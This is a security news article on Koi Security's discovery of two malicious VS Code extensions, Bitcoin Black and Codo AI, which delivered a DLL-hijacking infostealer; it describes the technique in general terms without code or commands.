A new pair of malicious Visual Studio Code extensions capable of harvesting screenshots, browser sessions and stored credentials has been discovered by cybersecurity researchers.
The extensions, Bitcoin Black and Codo AI, were available on the VS Code marketplace and were observed delivering a stealthy DLL-based infostealer through an unusual combination of social engineering and technical disguise.
The malicious tools were detailed in a report published by the Koi Security research team on Monday.
Two Extensions, One Campaign
Koi said what’s new about this campaign is the way the attacker packaged the tools.
Bitcoin Black presented itself as a cryptocurrency-themed color scheme, while Codo AI offered a functional coding assistant that integrated ChatGPT and DeepSeek. Both, however, executed hidden scripts that downloaded a payload using a bundled version of the Lightshot screenshot tool paired with a malicious DLL.
The researchers found that Bitcoin Black, despite claiming to be only a theme, used activation events and PowerShell execution uncommon for legitimate themes.
Codo AI went further by providing genuine coding features, which helped the attacker avoid suspicion during installation and use.
Read more on developer tool security: Red Team Tool Developer Shellter Admits ‘Misuse’ by Adversaries
Koi said they analyzed multiple versions of the extensions and observed rapid refinement. Version 2.5.0 relied on a complex PowerShell routine that downloaded a password-protected ZIP archive and attempted extraction through several fallback methods.
By version 3.3.0, the attacker had streamlined the delivery chain, switching to a hidden batch script that fetched an executable and DLL directly over HTTP and prevented repeated execution through a marker file.
The infostealer collected a wide range of information, including:
-
Clipboard contents
-
Installed programs
-
Running processes
-
Desktop screenshots
-
Stored WiFi credentials
-
Browser session data
DLL Hijacking and C2 Links
As mentioned above, the payload used DLL hijacking by pairing a legitimate Lightshot executable with the attacker’s DLL. This method allowed the malware to run under the guise of a trusted binary.
Koi Security identified command-and-control (C2) domains designed to receive exfiltrated data, along with a distinct mutex name intended to stop multiple instances from running simultaneously.
The researchers attributed both extensions to the same threat actor experimenting with separate lures.
“A developer could install what looks like a harmless theme or a useful AI tool, and within seconds their WiFi passwords, clipboard contents and browser sessions are being exfiltrated to a remote server,” they explained.
“At the time of writing, Codo AI is still live on the VS Code marketplace. The attack surface for developer tools continues to expand, and attackers are paying attention.”
